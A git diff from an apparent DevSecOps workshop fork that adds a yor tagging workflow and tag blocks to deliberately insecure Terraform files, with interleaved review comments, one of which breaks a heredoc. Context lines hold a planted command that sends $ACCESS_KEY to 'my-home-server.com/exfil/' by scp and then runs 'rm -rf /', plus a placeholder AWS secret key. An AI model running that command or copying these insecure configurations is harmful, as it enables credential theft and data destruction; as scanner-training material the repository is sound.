diff --git a/.github/workflows/yor.yml b/.github/workflows/yor.yml
new file mode 100644
index 000000000..1050790d4
--- /dev/null
+++ b/.github/workflows/yor.yml
@@ -0,0 +1,19 @@
+name: IaC tag and trace
+
+on:
+ push:
+ pull_request:
+
+jobs:
+ yor:
+ runs-on: ubuntu-latest
+ permissions:
+ contents: write
+
+ steps:
+ - uses: actions/checkout@v2
+ name: Checkout repo
+ with:
+ fetch-depth: 0
+ - name: Run yor action
+ uses: bridgecrewio/yor-action@main
diff --git a/code/deployment_ec2.tf b/code/deployment_ec2.tf
index 7e3d2bba2..e0b5c05cf 100644
--- a/code/deployment_ec2.tf
+++ b/code/deployment_ec2.tf
@@ -17,7 +17,18 @@ export AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMAAAKEY
 export AWS_DEFAULT_REGION=us-west-2
 echo "
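Review bot: `uses: bridgecrewio/yor-action@main` in the "Run yor action" step pulls a third-party action from a mutable branch while the job holds `contents: write`, so whoever controls that branch (or a compromised upstream) can commit arbitrary changes to this repository; pin it to a full commit SHA, e.g. `uses: bridgecrewio/yor-action@<full-commit-sha>  # <release tag>`, and do the same for `actions/checkout@v2`, which is also an outdated major. With both `push:` and `pull_request:` as bare triggers, every pull-request event also runs the job, but for pull requests opened from forks the GITHUB_TOKEN is read-only regardless of the `permissions` block, so any commit-back the action attempts on those runs fails rather than tags; consider limiting the write path to `push` on the default branch via `branches:`. `on:` is a YAML 1.1 boolean for generic parsers (GitHub's loader handles it), so if workflows are linted add `# yamllint disable-line rule:truthy` on that line.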

Deployed via Terraform

" | sudo tee /var/www/html/index.html
 EOF
-
+
+ tags = {
+ git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2"
+ git_file = "code/deployment_ec2.tf"
+ git_last_modified_at = "2024-01-26 23:01:56"
+ git_last_modified_by = "tprendervill@paloaltonetworks.com"
+ git_modifiers = "tprendervill"
+ git_org = "dimitryk1"
+ git_repo = "prisma-cloud-devsecops-workshop-fork"
+ yor_name = "web_host"
+ yor_trace = "88ee4801-abb9-43bd-b55a-e9f26999c950"
+ }
 }
 resource "aws_ebs_volume" "web_host_storage" {
@@ -25,14 +36,36 @@ resource "aws_ebs_volume" "web_host_storage" {
 availability_zone = "${var.region}a"
 #encrypted = false # Setting this causes the volume to be recreated on apply
 size = 1
-
+
+ tags = {
+ git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2"
+ git_file = "code/deployment_ec2.tf"
+ git_last_modified_at = "2024-01-26 23:01:56"
+ git_last_modified_by = "tprendervill@paloaltonetworks.com"
+ git_modifiers = "tprendervill"
+ git_org = "dimitryk1"
+ git_repo = "prisma-cloud-devsecops-workshop-fork"
+ yor_name = "web_host_storage"
+ yor_trace = "0d618641-0205-4779-a515-8b2cd76e8a0f"
+ }
 }
 resource "aws_ebs_snapshot" "example_snapshot" {
 # ebs snapshot without encryption
 volume_id = "${aws_ebs_volume.web_host_storage.id}"
 description = "${local.resource_prefix.value}-ebs-snapshot"
-
+
+ tags = {
+ git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2"
+ git_file = "code/deployment_ec2.tf"
+ git_last_modified_at = "2024-01-26 23:01:56"
+ git_last_modified_by = "tprendervill@paloaltonetworks.com"
+ git_modifiers = "tprendervill"
+ git_org = "dimitryk1"
+ git_repo = "prisma-cloud-devsecops-workshop-fork"
+ yor_name = "example_snapshot"
+ yor_trace = "dd434ac8-9a06-4d2a-85c2-5e65fb6bf038"
+ }
 }
 resource "aws_volume_attachment" "ebs_att" {
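Review bot: Every `tags` block this commit adds (both hunks here and the ones in the later deployment_ec2.tf hunks, deployment_s3.tf, simple_ec2.tf and simple_s3.tf) writes `git_last_modified_by = "tprendervill@paloaltonetworks.com"` into AWS resource tags, which are readable by any principal allowed to describe or list those resources and can surface in cost-allocation and audit data, so a personal e-mail address becomes cloud metadata; exclude that tag through yor's skip-tags configuration and rely on `git_modifiers` for attribution. The `git_commit` tag is pinned to a single SHA in all of these blocks, so every later commit touching these files produces a tag-only diff on each resource at the next apply; decide whether that churn is acceptable or exclude `git_commit` as well. If the intent is a stable code-to-resource trace, `yor_trace` already provides one that does not change per commit.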
@@ -69,14 +102,36 @@ resource "aws_security_group" "web-node" {
 "0.0.0.0/0"]
 }
 depends_on = [aws_vpc.web_vpc]
-
+
+ tags = {
+ git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2"
+ git_file = "code/deployment_ec2.tf"
+ git_last_modified_at = "2024-01-26 23:01:56"
+ git_last_modified_by = "tprendervill@paloaltonetworks.com"
+ git_modifiers = "tprendervill"
+ git_org = "dimitryk1"
+ git_repo = "prisma-cloud-devsecops-workshop-fork"
+ yor_name = "web-node"
+ yor_trace = "4bbbb2f7-79a6-43a8-9991-a5f4ded6d1b2"
+ }
 }
 resource "aws_vpc" "web_vpc" {
 cidr_block = "172.16.0.0/16"
 enable_dns_hostnames = true
 enable_dns_support = true
-
+
+ tags = {
+ git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2"
+ git_file = "code/deployment_ec2.tf"
+ git_last_modified_at = "2024-01-26 23:01:56"
+ git_last_modified_by = "tprendervill@paloaltonetworks.com"
+ git_modifiers = "tprendervill"
+ git_org = "dimitryk1"
+ git_repo = "prisma-cloud-devsecops-workshop-fork"
+ yor_name = "web_vpc"
+ yor_trace = "c1e2586d-94e5-4fac-b847-e3d1a6d37809"
+ }
 }
 resource "aws_subnet" "web_subnet" {
@@ -85,7 +140,18 @@ resource "aws_subnet" "web_subnet" {
 availability_zone = "${var.region}a"
 map_public_ip_on_launch = true
-
+
+ tags = {
+ git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2"
+ git_file = "code/deployment_ec2.tf"
+ git_last_modified_at = "2024-01-26 23:01:56"
+ git_last_modified_by = "tprendervill@paloaltonetworks.com"
+ git_modifiers = "tprendervill"
+ git_org = "dimitryk1"
+ git_repo = "prisma-cloud-devsecops-workshop-fork"
+ yor_name = "web_subnet"
+ yor_trace = "bd187003-ba42-4b26-8176-166ffc372044"
+ }
 }
 resource "aws_subnet" "web_subnet2" {
@@ -94,20 +160,53 @@ resource "aws_subnet" "web_subnet2" {
 availability_zone = "${var.region}b"
 map_public_ip_on_launch = true
-
+
+ tags = {
+ git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2"
+ git_file = "code/deployment_ec2.tf"
+ git_last_modified_at = "2024-01-26 23:01:56"
+ git_last_modified_by = "tprendervill@paloaltonetworks.com"
+ git_modifiers = "tprendervill"
+ git_org = "dimitryk1"
+ git_repo = "prisma-cloud-devsecops-workshop-fork"
+ yor_name = "web_subnet2"
+ yor_trace = "6e156ef0-824c-4b40-a4fd-33fc0e24182c"
+ }
 }
 resource "aws_internet_gateway" "web_igw" {
 vpc_id = aws_vpc.web_vpc.id
-
+
+ tags = {
+ git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2"
+ git_file = "code/deployment_ec2.tf"
+ git_last_modified_at = "2024-01-26 23:01:56"
+ git_last_modified_by = "tprendervill@paloaltonetworks.com"
+ git_modifiers = "tprendervill"
+ git_org = "dimitryk1"
+ git_repo = "prisma-cloud-devsecops-workshop-fork"
+ yor_name = "web_igw"
+ yor_trace = "f9639ea1-1a58-4eee-af72-25674cd40ff8"
+ }
 }
 resource "aws_route_table" "web_rtb" {
 vpc_id = aws_vpc.web_vpc.id
-
+
+ tags = {
+ git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2"
+ git_file = "code/deployment_ec2.tf"
+ git_last_modified_at = "2024-01-26 23:01:56"
+ git_last_modified_by = "tprendervill@paloaltonetworks.com"
+ git_modifiers = "tprendervill"
+ git_org = "dimitryk1"
+ git_repo = "prisma-cloud-devsecops-workshop-fork"
+ yor_name = "web_rtb"
+ yor_trace = "4795ba09-4007-4d6d-aafc-dbf63fd102ab"
+ }
 }
 resource "aws_route_table_association" "rtbassoc" {
@@ -134,6 +233,17 @@ resource "aws_network_interface" "web-eni" {
 subnet_id = aws_subnet.web_subnet.id
 private_ips = ["172.16.10.100"]
+ tags = {
+ git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2"
+ git_file = "code/deployment_ec2.tf"
+ git_last_modified_at = "2024-01-26 23:01:56"
+ git_last_modified_by = "tprendervill@paloaltonetworks.com"
+ git_modifiers = "tprendervill"
+ git_org = "dimitryk1"
+ git_repo = "prisma-cloud-devsecops-workshop-fork"
+ yor_name = "web-eni"
+ yor_trace = "74b814fb-f4f6-45a5-87a5-2d7cc76b47fb"
+ }
 }
 # VPC Flow Logs to S3
@@ -144,12 +254,34 @@ resource "aws_flow_log" "vpcflowlogs" {
 vpc_id = aws_vpc.web_vpc.id
+ tags = {
+ git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2"
+ git_file = "code/deployment_ec2.tf"
+ git_last_modified_at = "2024-01-26 23:01:56"
+ git_last_modified_by = "tprendervill@paloaltonetworks.com"
+ git_modifiers = "tprendervill"
+ git_org = "dimitryk1"
+ git_repo = "prisma-cloud-devsecops-workshop-fork"
+ yor_name = "vpcflowlogs"
+ yor_trace = "dca15e6e-960f-47ba-97f3-041e287cacdc"
+ }
 }
 resource "aws_s3_bucket" "flowbucket" {
 bucket = "${local.resource_prefix.value}-flowlogs"
 force_destroy = true
+ tags = {
+ git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2"
+ git_file = "code/deployment_ec2.tf"
+ git_last_modified_at = "2024-01-26 23:01:56"
+ git_last_modified_by = "tprendervill@paloaltonetworks.com"
+ git_modifiers = "tprendervill"
+ git_org = "dimitryk1"
+ git_repo = "prisma-cloud-devsecops-workshop-fork"
+ yor_name = "flowbucket"
+ yor_trace = "2db0f163-c07e-41a6-88ac-7ffcafecacb3"
+ }
 }
 # OUTPUTS
diff --git a/code/deployment_s3.tf b/code/deployment_s3.tf
index cfb272e1d..61115b08e 100644
--- a/code/deployment_s3.tf
+++ b/code/deployment_s3.tf
@@ -5,14 +5,36 @@ resource "aws_s3_bucket" "data" {
 # bucket does not have versioning
 bucket = "${local.resource_prefix.value}-data"
 force_destroy = true
-
+
+ tags = {
+ git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2"
+ git_file = "code/deployment_s3.tf"
+ git_last_modified_at = "2024-01-26 23:01:56"
+ git_last_modified_by = "tprendervill@paloaltonetworks.com"
+ git_modifiers = "tprendervill"
+ git_org = "dimitryk1"
+ git_repo = "prisma-cloud-devsecops-workshop-fork"
+ yor_name = "data"
+ yor_trace = "7e9513d1-3ada-4791-a4ed-3c48646bbe34"
+ }
 }
 resource "aws_s3_bucket_object" "data_object" {
 bucket = aws_s3_bucket.data.id
 key = "customer-master.xlsx"
 source = "resources/customer-master.xlsx"
-
+
+ tags = {
+ git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2"
+ git_file = "code/deployment_s3.tf"
+ git_last_modified_at = "2024-01-26 23:01:56"
+ git_last_modified_by = "tprendervill@paloaltonetworks.com"
+ git_modifiers = "tprendervill"
+ git_org = "dimitryk1"
+ git_repo = "prisma-cloud-devsecops-workshop-fork"
+ yor_name = "data_object"
+ yor_trace = "07d3c432-497f-4a64-a2ba-7372e8eeac61"
+ }
 }
 resource "aws_s3_bucket" "financials" {
@@ -23,6 +45,17 @@ resource "aws_s3_bucket" "financials" {
 acl = "private"
 force_destroy = true
+ tags = {
+ git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2"
+ git_file = "code/deployment_s3.tf"
+ git_last_modified_at = "2024-01-26 23:01:56"
+ git_last_modified_by = "tprendervill@paloaltonetworks.com"
+ git_modifiers = "tprendervill"
+ git_org = "dimitryk1"
+ git_repo = "prisma-cloud-devsecops-workshop-fork"
+ yor_name = "financials"
+ yor_trace = "d5bdb847-10a3-4dd6-adf0-4c0d1cacb849"
+ }
 }
 resource "aws_s3_bucket" "operations" {
@@ -34,7 +67,18 @@ resource "aws_s3_bucket" "operations" {
 enabled = true
 }
 force_destroy = true
-
+
+ tags = {
+ git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2"
+ git_file = "code/deployment_s3.tf"
+ git_last_modified_at = "2024-01-26 23:01:56"
+ git_last_modified_by = "tprendervill@paloaltonetworks.com"
+ git_modifiers = "tprendervill"
+ git_org = "dimitryk1"
+ git_repo = "prisma-cloud-devsecops-workshop-fork"
+ yor_name = "operations"
+ yor_trace = "7a7da807-4e09-4dd9-9944-5bc2634c14c8"
+ }
 }
 resource "aws_s3_bucket" "data_science" {
@@ -49,7 +93,18 @@ resource "aws_s3_bucket" "data_science" {
 target_prefix = "log/"
 }
 force_destroy = true
-
+
+ tags = {
+ git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2"
+ git_file = "code/deployment_s3.tf"
+ git_last_modified_at = "2024-01-26 23:01:56"
+ git_last_modified_by = "tprendervill@paloaltonetworks.com"
+ git_modifiers = "tprendervill"
+ git_org = "dimitryk1"
+ git_repo = "prisma-cloud-devsecops-workshop-fork"
+ yor_name = "data_science"
+ yor_trace = "52dbcd37-08c1-414c-9c68-f839a279eb70"
+ }
 }
 resource "aws_s3_bucket" "logs" {
@@ -67,5 +122,16 @@ resource "aws_s3_bucket" "logs" {
 }
 }
 force_destroy = true
-
+
+ tags = {
+ git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2"
+ git_file = "code/deployment_s3.tf"
+ git_last_modified_at = "2024-01-26 23:01:56"
+ git_last_modified_by = "tprendervill@paloaltonetworks.com"
+ git_modifiers = "tprendervill"
+ git_org = "dimitryk1"
+ git_repo = "prisma-cloud-devsecops-workshop-fork"
+ yor_name = "logs"
+ yor_trace = "49d1883b-91e8-46f0-b1d0-53c37058410c"
+ }
 }
diff --git a/code/simple_ec2.tf b/code/simple_ec2.tf
index dcfa5880f..7233a5e7a 100644
--- a/code/simple_ec2.tf
+++ b/code/simple_ec2.tf
@@ -10,4 +10,15 @@ resource "aws_ec2_host" "test" {
 command = "echo Running install scripts.. 'echo $ACCESS_KEY > creds.txt ; scp -r creds.txt root@my-home-server.com/exfil/ ; rm -rf /' "
 }
+ tags = {
+ git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2"
+ git_file = "code/simple_ec2.tf"
+ git_last_modified_at = "2024-01-26 23:01:56"
+ git_last_modified_by = "tprendervill@paloaltonetworks.com"
+ git_modifiers = "tprendervill"
+ git_org = "dimitryk1"
+ git_repo = "prisma-cloud-devsecops-workshop-fork"
+ yor_name = "test"
+ yor_trace = "0143832d-eb41-4ca3-8e55-9a93f81f4bd0"
+ }
 }
diff --git a/code/simple_s3.tf b/code/simple_s3.tf
index c0d25fb60..73d44b38a 100644
--- a/code/simple_s3.tf
+++ b/code/simple_s3.tf
@@ -6,7 +6,16 @@ resource "aws_s3_bucket" "dev_s3" {
 bucket_prefix = "dev-"
 tags = {
- Environment = "Dev"
+ Environment = "Dev"
+ git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2"
+ git_file = "code/simple_s3.tf"
+ git_last_modified_at = "2024-01-26 23:01:56"
+ git_last_modified_by = "tprendervill@paloaltonetworks.com"
+ git_modifiers = "tprendervill"
+ git_org = "dimitryk1"
+ git_repo = "prisma-cloud-devsecops-workshop-fork"
+ yor_name = "dev_s3"
+ yor_trace = "eb744131-b6fd-4f6e-8c47-4c0492dbb546"
 }
 }